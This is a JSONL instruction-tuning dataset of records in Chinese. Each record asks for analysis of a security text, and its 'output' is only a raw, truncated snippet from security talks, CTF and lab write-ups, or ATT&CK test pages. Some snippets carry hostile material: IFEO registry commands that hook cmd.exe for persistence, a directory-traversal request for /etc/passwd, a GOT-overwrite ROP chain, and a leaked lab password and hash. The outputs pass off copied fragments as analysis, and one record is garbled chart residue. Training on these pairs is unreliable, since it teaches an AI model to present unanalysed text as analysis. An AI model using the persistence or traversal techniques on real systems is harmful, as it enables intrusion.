{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSharpC2 beacon插件机制 Demo代码位置: AgentModules\\DemoModule\\Module.cs 关于插件接口定义 代码位置:Agents\\Stage\\Interfaces\\IAgentModule.cs Init() 方法初始化插件接收两个参数第一个AgentController 规范beacon的行为,定义beacon的通用 功能; 其中 RegisterAgentModule方法需要关注下 再来看第二个参数 ConfigController.cs; // AgentController.cs public void RegisterAgentModule(IAgentModule Module) { // 初始化插件 ConfigController Config Module.Init(this, Config); // 添加模块信息 AgentModules.Add(Module.GetModuleInfo()); } 通过AgentConfigs字典保存beacon的核心信息Set()方法设置beacon配置;还记得之前推过一个 C#写的Agent端里面有个动态修改Config功能和这个差不多意思泛型方法Get() 获取beacon配置 信息; AgentConfig 包括KillData,PPID,BlockDLLs,SpawnTo,Sleep等这些信息基本都是全局 的也就是beacon存活期间必定存在的 重新回到AgentController.cs List AgentModules全局保存 beacon的module信息 可以看到解密完数据后利用Linq 从AgentModules中先获取Module信息再获取命令然后使用call back委托执行具体的命令 Tips: 想要获取命令指令或明文返回结果 首先我们要锁定在AgentController.cs中在解密后和加 密前记录数据然后分析 发送消息函数: SendMessage(C2Data) 也有对应的重载函数 第一套用来发送 Core,AgentOutput 要回传的数据第二套用来自定义的插件模块 关于Beacon端的 LinkAgent, 功能类似 CobaltStrike中的SMB beacon, 即不需要beacon于 TeamServer服务器直连可以借助中间进行数据转发这个后面单独分析 在了解了 AgentController和ConfigController核心操作后接下来我们跟进核心功能 代码位置: Modules\\Core\\CoreModule.cs Beacon所有的功能都必须按照规范 也就是继承IAgentModule接口完成Init() 初始化操作和 GetModuleInfo() 公开当前模块的实体功能 CoreModule.cs public void RegisterAgentModule(IAgentModule Module) { Module.Init(this, Config); AgentModules.Add(Module.GetModuleInfo()); } 具体看ModuleInfo类 public class ModuleInfo { // Name表示当前模块的名称 public string Name { get; set; } // 当前模块具体含有的命令 public List<Command> Commands { get; set; } public class Command { 前面我们说过 AgentController 里面的RegisterAgentModule函数挺重要的当然在注册 AgentModule前肯定需要先加载 整个逻辑非常清楚了 从我们下发的AgentTask 对象 Parameters字典参数中获取 Assembly,加载 到当前域中根据前面的接口规范创建实例获取ModuleInfo,但是这里成功注册模块后 控制端 UI上并没有输出相关帮助信息而且执行功能也没有返回实际的结果 这里需要对比下 SharpC2 早期版本Dev branch 之前在https://www.c2.tips/2020/10/265/也提到过,load-module怎么做的具体看下代码 // 命令的名称 public string Name { get; set; } // 命令执行委托回调 public AgentController.AgentCommand Delegate { get; set; } } } // 不得不说 除了学习代码功能如何设计也是重点难点啊:) // SharpC2 Dev版本\\Client\\AgentCommand.cs public s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMicrosoft Passport Yahoo MMORPG MMORPG MMORPG MMORPG 0 5000 10000 15000 20000 25000 30000 35000 40000 02/07 02/10 02/13 02/16 02/19 02/22 02/25 02/28 03/03 03/06 03/09 03/12 03/15 03/18 03/21 03/24 03/27 03/30 04/02 04/05 04/08 04/11 04/14 04/17 04/20 04/23 04/26 04/29 05/02 0 1000 2000 3000 4000 5000 6000 7000 8000 9000 CCU Lock counts 0 1000 2000 3000 4000 5000 6000 7000 8000 9000 02/07 02/10 02/13 02/16 02/19 02/22 02/25 02/28 03/03 03/06 03/09 03/12 03/15 03/18 03/21 03/24 03/27 03/30 04/02 04/05 04/08 04/11 04/14 04/17 04/20 04/23 04/26 04/29 05/02 0 200000 400000 600000 800000 1000000 1200000 1400000 Lock Counts Income ! \"!! ! # #$% ! # #&\" !% !'%&($' )*#+,-../+0*)- *#1.22+.+*.3/1%4 Traffic Analysis CAPATCHA Signature Based Detection Anti-virus 5 5 56.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# tcache tcache 是 glibc 2.26 (ubuntu 17.10) 之后引入的一种技术see [commit](https://sourceware.org/git/?p=glibc.git;a=commitdiff;h=d5c3fafc4307c9b7a4c7d5cb381fcdbfad340bcc)目的是提升堆管理的性能但提升性能的同时舍弃了很多安全检查也因此有了很多新的利用方式 > 主要参考了 glibc 源码angelboy 的 slide 以及 tukan.farm链接都放在最后了 ## 相关结构体 tcache 引入了两个新的结构体`tcache_entry` 和 `tcache_perthread_struct` 这其实和 fastbin 很像但又不一样 ### tcache_entry [source code](https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#tcache_entry) ```C /* We overlay this structure on the user-data portion of a chunk when the chunk is stored in the per-thread cache. */ typedef struct tcache_entry { struct tcache_entry *next; } tcache_entry; ``` `tcache_entry` 用于链接空闲的 chunk 结构体其中的 `next` 指针指向下一个大小相同的 chunk 需要注意的是这里的 next 指向 chunk 的 user data而 fastbin 的 fd 指向 chunk 开头的地址 而且tcache_entry 会复用空闲 chunk 的 user data 部分 ### tcache_perthread_struct [source code](https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#tcache_perthread_struct) ```C /* There is one of these for each thread, which contains the per-thread cache (hence \"tcache_perthread_struct\"). Keeping overall size low is mildly important. Note that COUNTS and ENTRIES are redundant (we could have just counted the linked list each time), this is for performance reasons. */ typedef struct tcache_perthread_struct { char counts[TCACHE_MAX_BINS]; tcache_entry *entries[TCACHE_MAX_BINS]; } tcache_perthread_struct; # define TCACHE_MAX_BINS 64 static __thread tcache_perthread_struct *tcache = NULL; ``` 每个 thread 都会维护一个 `tcache_perthread_struct`它是整个 tcache 的管理结构一共有 `TCACHE_MAX_BINS` 个计数器和 `TCACHE_MAX_BINS`项 tcache_entry其中 - `tcache_entry` 用单向链表的方式链接了相同大小的处于空闲状态free 后的 chunk这一点上和 fastbin 很像 - `counts` 记录了 `tcache_entry` 链上空闲 chunk 的数目每条链上最多可以有 7 个 chunk 用图表示大概是 ## 基本工作方式 - 第一次 malloc 时会先 malloc 一块内存用来存放 `tcache_perthread_struct`  - free 内存且 size 小于 small bin size 时 - tcache 之前会放到 fastbin 或者 unsorted bin 中 - tcache 后 - 先放到对应的 tcache 中直到 tcache 被填满默认是 7 个 - tcache 被填满之后再次 free 的内存和之前一样被放到 fastbin 或者 unsorted bin 中 - tcach", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npin2pwn: How to Root an Embedded Linux Box with a Sewing Needle Brad Dixon - Carve Systems DEF CON 24  It works  Easy  Teachable  Dramatic USEFUL NOVELTY  Risky  Crude  Perhaps redundant Demo Prior Art  Significant body of work around fault injection and glitching at the IC level for secure processors  Recent system-level applications: - 2004: WRT54 Bricked Router recovery, Administrator note by mbm - How to Hack the Hudl  We give Rockchip a good seeing to, Pen Test Partners blog post - WINKHUB Side Channel Attack, Kevin2600 For today  When this attack can be effective  Why this attack works  How to defend against this attack RISKS TO HARDWARE  I have not yet destroyed hardware but this is abuse of semiconductor devices.  Use on equipment you can afford to destroy.  Depending on the hardware you may have better and safer options. Use those first. 102 Generic Networked Doohickey Product Design Order of Attack 1. Serial 2. JTAG 3.  4. Flash to CPU interface CPU Flash Ethernet Memory Serial JTAG Other I/O Parallel or SPI flash poke here Why does this work?  Disrupt boot chain with a transient fault  Activate an unexpected failure path Boot loader Kernel load to RAM Scan / Mount ? Init / Start App poke now or now Scenario #1: Exploitable U-Boot Configuration 1. No JTAG. 2. Homegrown secure boot 3. Try to load and boot kernel #1 4. Try to load and boot kernel #2 5. If that fails then return to U-Boot prompt! Scenario #2: Exploitable Init Configuration  /bin/init reads /etc/inittab  /bin/init runs /etc/rc  /etc/rc starts application in the foreground  Application grabs console and presents a login prompt with credentials we dont know  BUT if the application fails to load then /bin/init runs /bin/sh Lab Example  FT232R - IOH=2mA - Imax=24mA How To  Survey HW  Identify ports to monitor boot  Datasheets  Inspect failure modes, if possible  Get boot timing Prepare  Select pins to poke  Get some timing help  Poke!  May take a few attempts  Power-off between tests Poke  Monitor for", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n作者:http://www.sectop.com/ 文档制作:http://www.mythhack.com PHP 代码审计 目录 1. 概述 ...................................................................... 2 2. 输入验证和输出显示 ......................................................... 2 1. 命令注入 ............................................................ 3 2. 跨站脚本 ............................................................ 3 3. 文件包含 ............................................................ 4 4. 代码注入 ............................................................ 4 5. SQL注入 ............................................................. 4 6. XPath 注入 ........................................................... 4 7. HTTP响应拆分 ........................................................ 5 8. 文件管理 ............................................................ 5 9. 文件上传 ............................................................ 5 10. 变量覆盖 ............................................................ 5 11. 动态函数 ............................................................ 6 3. 会话安全 .................................................................. 6 1. HTTPOnly设置 ........................................................ 6 2. domain 设置 .......................................................... 6 3. path设置 ............................................................ 6 4. cookies持续时间 ...................................................... 6 5. secure 设置 .......................................................... 6 6. session固定 ......................................................... 7 7. CSRF ................................................................ 7 4. 加密 ...................................................................... 7 1. 明文存储密码 ......................................................... 7 2. 密码弱加密........................................................... 7 3. 密码存储在攻击者能访问到的文件 ......................................... 7 5. 认证和授权................................................................. 7 1. 用户认证 ....................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1546-012-win-事件触发执行-图片文件执行选项注入 ## 来自ATT&CK描述 攻击者可以通过执行由图像文件执行选项 (IFEO) 调试器触发的恶意内容来建立持久性或权限提升IFEO使开发人员能够将调试器附加到应用程序创建进程时应用程序的IFEO中的调试器将附加到应用程序的名称之前从而有效地在调试器下启动新进程例如`C:\\dbg\\ntsd.exe -g notepad.exe` IFEO可以通过注册表直接设置也可以通过GFlags工具在Global Flags中设置IFEO表示为`Debugger`注册表中的值在那里是附加调试器的二进制文件`HKLM\\SOFTWARE{{\\Wow6432Node}}\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\``<executable>` IFEO还可以在指定程序静默退出即被自身或第二个非内核模式进程提前终止时启动任意监控程序与调试器类似静默退出监控可以通过GFlags或通过直接修改 IFEO和静默进程退出注册表值来启用`HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\` 与Accessibility Features类似在 Windows Vista 和更高版本以及 Windows Server 2008或更高版本上可以修改注册表项将cmd.exe或其他提供后门访问的程序配置为可访问性程序的调试器 例如utilman.exe修改注册表后在使用键盘或与远程桌面协议连接时在登录屏幕上按适当的组合键将导致调试器程序以 SYSTEM 权限执行 与Process Injection类似这些值也可能被滥用通过利用恶意可执行文件在计算机上不同进程的上下文中加载和运行来获得权限提升安装IFEO机制还可以通过持续触发调用来提供持久性 恶意软件还可能通过注册无效调试器来使用IFEO来减少防御这些调试器重定向并有效地禁用各种系统和安全应用程序 ## 测试案例 ### 测试1 IFEO Add Debugger 测试命令用命令提示符运行需要管理员权限root/admin ``` REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{target_binary}\" /v Debugger /d \"#{payload_binary}\" ``` target_binaryC:\\Windows\\System32\\calc.exe payload_binaryC:\\Windows\\System32\\cmd.exe 清理命令 ``` reg delete \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{target_binary}\" /v Debugger /f >nul 2>&1 ``` ### 测试2 IFEO Global Flags 测试命令用命令提示符运行需要管理员权限root/admin ``` REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\#{target_binary}\" /v GlobalFlag /t REG_DWORD /d 512 REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{target_binary}\" /v ReportingMode /t REG_DWORD /d 1 REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\#{target_binary}\" /v MonitorProcess /d \"#{payload_binary}\" ``` target_binaryC:\\Windows\\System32\\notepad.exe payload_binaryC:\\Windows\\System32\\cmd.exe 清理命令 ``` reg delete \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File E", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nResilience Despite Malicious Participants Radia Perlman radia.perlman@emc.com EMC 1 This talk  Ill give a few examples to show the wildly different types of problems and solutions 2 Byzantine Failures  Fail-stop: Something works perfectly, then halts  Byzantine: Where something stops doing the right thing, but doesnt halt, for instance  Sends incorrect information  Computes incorrectly  The term came from a famous paper where a bunch of processors try to agree on the value of a bit (attack or retreat)  Lamport, L., Shostak, R., Pease, M. (1982). The Byzantine Generals Problem, ACM Transactions on Programming Languages and System  Misbehavior can cause problems even if not consciously malicious (bugs, misconfiguration, hardware errors) 3 Malicious Participants  All sorts of things can be subverted with a small number of malicious participants  How a Lone Hacker Shredded the Myth of Crowdsourcing  https://medium.com/backchannel/how-a-lone-hacker- shredded-the-myth-of-crowdsourcing-d9d0534f1731 4 Malicious Participants  All sorts of things can be subverted with a small number of malicious participants  How a Lone Hacker Shredded the Myth of Crowdsourcing  https://medium.com/backchannel/how-a-lone-hacker- shredded-the-myth-of-crowdsourcing-d9d0534f1731  HoweverThings that shouldnt work (but do)  Wikipedia  Ebay 5 Ill talk about different examples  PKI model resilient to malicious CAs  Networks resilient to malicious switches  Resilient and nonresilient designs for data storage with assured delete  Human 6 Example 1: PKI 7 Whats PKI?  Public Key Infrastructure  A way for me to know your public key 8 Next topic: Trust Models for PKI  Where damage from dishonest or confused CAs can be limited 9 Quick review of public keys, certificates, PKI, CAs  Certification Authority (CA) signs Certificates 10 Alices Certificate, signed by CA 11 Name=Alice Public key= 489024729 CAs signature Communication using certs Alice Bob Alice, [Alices key is 24789]CA Bob, [Bobs key is 34975]CA mu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking 911: Adventures in Disruption, Destruction, and Death quaddi, r3plicant & Peter Hefley August 2014 Jeff Tully Christian Dameff Peter Hefley Physician, MD Emergency Medicine Physician, MD Pediatrics IT Security, MSM, C|CISO, CISA, CISSP, CCNP, QSA Senior Manager, Sunera Jeff Tully Christian Dameff Peter Hefley Open CTF champion sudoers- Defcon 16 Speaker, Defcon 20 Wrote a program for his TI-83 graphing calculator in middle school Speaker, Defcon 20 Gun hacker, SBR aficianado This talk is neither sponsored, endorsed, or affiliated with any of our respective professional institutions or companies. No unethical or illegal practices were used in researching, acquiring, or presenting the information contained in this talk. Do not attempt the theoretical or practical attack concepts outlined in this talk. Disclaimer Outline - Why This Matters (Pt. 1) - 911 Overview - Methodology - Attacks - Why This Matters (Pt. 2) Why This Matters (Pt. 1) 4/26/2003 9:57pm Emergency Medical Services (EMS) Research Aims  Investigate potential vulnerabilities across the entire 911 system  Detail current attacks being carried out on the 911 system  Propose solutions for existing vulnerabilities and anticipate potential vectors for future infrastructure modifications Methodology  Interviews  Regional surveys  Process observations  Practical experimentation  Solution development Wired Telephone Call End Office Selective Router PSAP ALI Database Voice Only Voice and Data Data Voice Voice + ANI Voice + ANI ANI ALI Wireless Phase 1 Telephone Call Mobile Switching Center Selective Router PSAP ALI Database Voice Only Voice and Data Data Voice Voice + pANI/ESRK Voice + pANI/ESRK pANI / ESRK ALI Cell Tower Voice Callback # (CBN) Cell Tower Location Cell Tower Sector pANI / ESRK CBN, Cell Tower Location, Cell Tower Sector, pANI / ESRK Mobile Positioning Center Wireless Phase 1 Data Wireless Phase 2 Telephone Call Mobile Switching Center Selective Router PSAP ALI Database Voice Only Voice and D", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### 64位程序格式化字符串漏洞原理 其实 64 位的偏移计算和 32 位类似都是算对应的参数只不过 64 位函数的前 6 个参数是存储在相应的寄存器中的那么在格式化字符串漏洞中呢虽然我们并没有向相应寄存器中放入数据但是程序依旧会按照格式化字符串的相应格式对其进行解析 ### hijack GOT原理 在目前的 C 程序中libc 中的函数都是通过 GOT 表来跳转的此外在没有开启 RELRO 保护的前提下每个 libc 的函数对应的 GOT 表项是可以被修改的因此我们可以修改某个 libc 函数的 GOT 表内容为另一个 libc 函数的地址来实现对程序的控制比如说我们可以修改 printf 的 got 表项内容为 system 函数的地址从而程序在执行 printf 的时候实际执行的是 system 函数 假设我们将函数 A 的地址覆盖为函数 B 的地址那么这一攻击技巧可以分为以下步骤 - 确定函数 A 的 GOT 表地址 - 这一步我们利用的函数 A 一般在程序中已有所以可以采用简单的寻找地址的方法来找 - 确定函数 B 的内存地址 - 这一步通常来说需要我们自己想办法来泄露对应函数 B 的地址 - 将函数B的内存地址写入到函数 A 的 GOT 表地址处 - 这一步一般来说需要我们利用函数的漏洞来进行触发一般利用方法有如下两种 - 写入函数write 函数 - ROP ```text pop eax; ret; # printf@got -> eax pop ebx; ret; # (addr_offset = system_addr - printf_addr) -> ebx add [eax] ebx; ret; # [printf@got] = [printf@got] + addr_offset ``` - 格式化字符串任意地址写 ### 堆上的格式化字符串漏洞原理 所谓堆上的格式化字符串指的是格式化字符串本身存储在堆上这个主要增加了我们获取对应偏移的难度而一般来说该格式化字符串都是很有可能被复制到栈上的 ### 格式化字符串盲打原理 所谓格式化字符串盲打指的是只给出可交互的 ip 地址与端口不给出对应的 binary 文件来让我们进行 pwn其实这个和 BROP 差不多不过 BROP 利用的是栈溢出而这里我们利用的是格式化字符串漏洞一般来说我们按照如下步骤进行 - 确定程序的位数 - 确定漏洞位置 - 利用", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWesley McGrew, Ph.D. Director of Cyber Operations wesley.mcgrew@hornecyber.com @McGrewSecurity Secure Penetration Testing Operations Demonstrated Weaknesses in Learning Material and Tools Bio  Co-Founder of HORNE Cyber, previously Halberd Group  Directs and participates  Penetration testing engagements  Research and development  Adjunct professor at Mississippi State University  NSA-CAE Cyber Operations program  Information Security & Reverse Engineering Insecure practices used on penetration tests put clients and penetration testers alike at risk. Penetration testers and clients during/between engagements are attractive soft targets. The root cause of this problem is a lack of awareness, and learning materials that teach insecure practices. This has to change. The Situation at a Glance  Previous and Current Work  The Threat  Role of Learning and Reference Materials  Analysis of Currently-Available Materials  Recommended Best Practices  Demonstration and Tool Release  Snagterpreter  Hijack meterpreter sessions  Conclusions  Call to Action What are we covering today? Two previous papers & presentations, DEF CON 21 and 23 Where are we? This work  a paper and talk studying the root causes of these issues, recommending change. Why is the compromise of a penetration tester attractive? As a Target Tools, tactics, procedures. Intellectual property. Operational Cover For Compromising Clients Testers are expected to break rules, attack, elevate privilege, exfiltrate. The Threat No Standard Dependent on experience, intuition, pattern recognition, and complex ad-hoc processes Tradeoff: Flexibility vs. Rigor We operate as we learn Lowest Common Denominator = Profit No formal requirements for education Few prerequisites No testing requirements Cause and Effect Testing Processes Follow Training Convenience and Expediency Lower Depth & Breadth of Technical Knowledge Lack of Situational Awareness in Secure Operation/Communication Re-applying procedures learned in reading/training t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# DC 7 下载地址https://download.vulnhub.com/dc/DC-7.zip ## 实战演练 靶场IP地址:`192.168.32.166` ![image-20220713134426055](../../.gitbook/assets/image-20220713134426055.png) 扫描对外端口 ``` (rootkali)-[~] # nmap -p1-65535 192.168.32.166 Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-13 01:44 EDT Nmap scan report for 192.168.32.166 Host is up (0.00068s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 00:0C:29:85:DD:9B (VMware) Nmap done: 1 IP address (1 host up) scanned in 2.66 seconds ``` 浏览器访问80端口,发现web框架是`Drupal` ![image-20220713134931984](../../.gitbook/assets/image-20220713134931984.png) 扫描drupal没有发现什么东西 ``` (rootkali)-[/opt/droopescan-master] # docker run droopescan scan drupal -u http://192.168.32.166 [+] No plugins found. [+] Themes found: startupgrowth_lite http://192.168.32.166/themes/startupgrowth_lite/ http://192.168.32.166/themes/startupgrowth_lite/LICENSE.txt [+] Possible version(s): 8.7.0 8.7.0-alpha1 8.7.0-alpha2 8.7.0-beta1 8.7.0-beta2 8.7.0-rc1 8.7.1 8.7.10 8.7.11 8.7.12 8.7.13 8.7.14 8.7.2 8.7.3 8.7.4 8.7.5 8.7.6 8.7.7 8.7.8 8.7.9 [+] Possible interesting urls found: Default admin - http://192.168.32.166/user/login [+] Scan finished (0:02:01.475158 elapsed) ``` Google搜索`@DC7USER`,发现一个源码仓库 ![image-20220713135743698](../../.gitbook/assets/image-20220713135743698.png) 在config.php找到一个用户和密码 ``` <?php $servername = \"localhost\"; $username = \"dc7user\"; $password = \"MdR3xOgB7#dW\"; $dbname = \"Staff\"; $conn = mysqli_connect($servername, $username, $password, $dbname); ?> ``` ![image-20220713135805156](../../.gitbook/assets/image-20220713135805156.png) 使用这个密码进行SSH登录,发现可以登录成功 ![image-20220713135904797](../../.gitbook/assets/image-20220713135904797.png) 查看`mbox`文件 ``` dc7user@dc-7:~$ cat mbox From root@dc-7 Thu Aug 29 17:00:22 2019 Return-path: <root@dc-7> Envelope-to: root@dc-7 Delivery-date: Thu, 29 Aug 2019 17:00:22 +1000 Received: from root by dc-7 with local (Exim 4.89) (envelope-from <root@dc-7>) id 1i", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBURPKIT Using WebKit to Own the Web 1 2015-07-15 Presented by: Nadeem Douba INTRODUCTION  Nadeem Douba  Founder of Red Canari, Inc.  Based out of Ottawa, ON.  Hacker  Interests:  Exploiting stuff  Building hacking tools  Prior work:  Sploitego (presented at DEF CON XX)  Canari (used by Fortune 100s)  PyMiProxy (used by Internet Archive) BurpKit - Using WebKit to Own the Web 2 2015-07-15 OVERVIEW  WebKit  What is it?  Why use it?  How can we use it?  BurpKit  Design Considerations  Implementation  Demos!  Conclusion  Questions? 2015-07-15 BurpKit - Using WebKit to Own the Web 3 THE WEB PEN-TESTERS CONUNDRUM  Todays web applications are complex beasts  Heavy use of JavaScript for:  Rendering pages  Rendering page elements  Performing web service requests  But our security tools are still scraping HTML!? 2015-07-15 BurpKit - Using WebKit to Own the Web 4 OUR TOOLKIT 2015-07-15 BurpKit - Using WebKit to Own the Web 5  Reconnaissance & Scanning:  Most tools (nikto, cewl, etc.) just scrape HTML  Attack:  BurpSuite Pro/Community  Lobo-based Renderer tab (Burps neglected child) !  No JavaScript/HTML5 support  Charles & Zed are just proxies  WebSecurifys Proxy.app only has a web view MODERN TOOLKIT REQUIREMENTS 2015-07-15 BurpKit - Using WebKit to Own the Web 6  Web penetration testing tools that:  Have modern web browser capabilities  Parse and interpret JavaScript  Dynamically render and inspect content  Most importantly:  Our tools need to be able to interact with the DOM! WEBKIT What is it good for? - Lots of things! 2015-07-15 BurpKit - Using WebKit to Own the Web 7 WHAT IS WEBKIT? WebKit is a layout engine software component for rendering web pages in web browsers. It powers Apple's Safari web browser, and a fork of the project is used by Google's Chrome web browser. - Wikipedia (https://en.wikipedia.org/wiki/WebKit) 2015-07-15 BurpKit - Using WebKit to Own the Web 8 Image credit: Smashing Magazine (UN)OFFICIAL DEFINITION 2015-07-15 BurpKit - Using WebKit to Own the We", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\npwunconv === 用来关闭用户的投影密码 ## 补充说明 **pwunconv命令** 与pwconv功能相反用来关闭用户的投影密码它会把密码从shadow文件内重回存到passwd文件里 ### 语法 ```shell pwunconv ``` ### 实例 ```shell pwunconv # 关闭影子密码 cat /etc/passwd | grep test # 发现密码已经在passwd文件中了 test:$6$nYOEWamm$bz07nlv/.RgJufb3FAqJJeULfwybzgxmrWqbk7O4vI0KsT6N.ujrh6dDIUcAJdfjksyuyAFDPIngZeD3cgcf.0:3001:3001::/home/test:/bin/sh ls /etc/shadow # 查看影子文件提示没有这个文件或目录 ls: cannot access /etc/shadow: No such file or directory ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Cyberware (web, 416, 24 solved) We get access to a webpage with links to 4 ascii-art files. If we simply click on them, we can't see the files and we get HTTP 412 response. Once we dig a bit deeper we can see a strange header `HTTP/1.1 412 referer sucks` Once we send a raw request with no headers, we get back a nice picture: ```python from crypto_commons.netcat.netcat_commons import nc def main(): s = nc(\"cyberware.ctf.hackover.de\", 1337) s.sendall(\"GET /fox.txt HTTP/1.0\\r\\nConnection: close\\r\\n\\r\\n\") print(s.recv(9999)) print(s.recv(9999)) pass main() ``` If we look closely at the responses we can see: ``` HTTP/1.1 200 Yippie Server: Linux/cyber Date: Sun, 07 Oct 2018 14:50:19 GMT Content-type: text/cyber Content-length: 414 ``` This could suggest a custom-made http server of some sort. Once we play around a bit we notice that there is a directory traversal there: ``` s.sendall(\"GET ./etc/passwd HTTP/1.0\\r\\nConnection: close\\r\\n\\r\\n\") ``` returns contents of `/etc/passwd` for us. Now we can get `/proc/self/cmdline` which tells us we're running `/usr/bin/python3 ./cyberserver.py`, and we can read this file to recover [server source code](cyberserver.py) The interesting part of the code is: ```python if path.startswith('flag.git') or search('\\\\w+/flag.git', path): self.send_response(403, 'U NO POWER') self.send_header('Content-type', 'text/cyber') self.end_headers() self.wfile.write(b\"Protected by Cyberware 10.1\") return ``` This suggests there is a `flag.git` repository there! It seems blacklisted, but `\\w+` does not match `/` and they included only a single `/` in the pattern so if we send two, it will bypass the check: ``` s.sendall(\"GET ./home/ctf//flag.git HTTP/1.0\\r\\nConnection: close\\r\\n\\r\\n\") ``` We get back a nice `HTTP/1.1 406 Cyberdir not accaptable`, so we made a proper request. Now what is left is to modify some git-repo-dumper like https://github.com/internetwache/GitTools/tree/master/Dumper to grab the contents of the git repo and there we can find t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1594-搜索受害者所拥有的网站 ## 来自ATT&CK的描述 攻击者可能会搜索目标组织拥有的网站以获取可在目标攻击中使用的信息目标组织拥有的网站可能包含各种细节包括部门/分部的名称物理位置和关键员工的数据如姓名角色和联系信息例如电子邮件地址这些网站还可能有突出商业运作和关系的细节 攻击者可能会搜索目标组织拥有的网站以收集可操作的信息来自这些来源的信息可能会提供其他形式的侦察机会例如钓鱼信息或搜索开放式技术数据库建立业务资源例如建立账户或破坏账户或初始访问例如信任关系或钓鱼 ## 测试案例 个人理解收集网站上公布的人事信息政府网站居多管理员邮箱信息等 ## 检测日志 无 ## 测试复现 无 ## 测试留痕 无 ## 检测规则/思路 无 ## 建议 许多此类攻击活动的发生率很高并且相关的误报率也很高并且有可能发生在目标组织的监测范围之外从而使防御者难以发现 检测工作可能会集中在攻击生命周期的相关阶段例如在\"初始访问\"阶段 ## 参考推荐 MITRE-ATT&CK-T1594 <https://attack.mitre.org/techniques/T1594>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSeparating Bots from Humans Ryan Mitchell @kludgist DEF CON 23 August 8th, 2015 Who am I?  Software Engineer  Author of two books:  Web Scraping with Python (OReilly, 2015)  Instant Web Scraping with Java (Packt, 2013)  Engineering grad from Olin College  Masters student at Harvard University School of Extension Studies, 2016 A history of this talk The OReilly Hacking Book: Separating Bots from Humans Pro-tips to get what you want:  Include some market research  Write it in Python, because its really popular What are Web Scrapers, Bots, etc?  They can use browsers  They can take their sweet time  They can be surprisingly smart  They can be stunningly idiotic Why Theyre Important source: https://www.incapsula.com/blog/bot-traffic-report-2014.html On the Defense Side of Things (For better or worse) robots.txt?  No Trespassing, please? Terms of Service  Hey! You said you wouldnt trespass! Headers  Im totally not a bot. Promise JavaScript  Make your site un-indexable for anyone but the bad guys Embedding Text in Images  Oh come on.  Youre the type of person who writes email addresses like m e (at sign) domain . com  And you have duct tape on your laptops web cam, mostly because you never use it. CAPTCHAs Annoying Breakable Honepots  Can be effective, if implemented correctly  Please dont block the Google bots Example time! http://ryanemitchell.com/honeypots.html Behavioral Patterns  Now were getting somewhere!  Again, please dont block the Google bots IP Address Blocking  Its sort of effective If they didnt really care in the first place  Lists are a pain to maintain  You can easily block the good guys On the Attack Side of Things... Targeted vs. Non-Targeted Attacks  Non-targeted: Also known as, look for /phpMyAdmin  Targeted, usually to get proprietary data OCR  Works best on relatively normal text  Can be used to solve CAPTCHAs  Time consuming to create training data. Have a series or two of a TV show ready OCR Training Tool  Everything you need to solve a CAPTCHA! h", "category": "text_analysis", "source": "security_papers"}
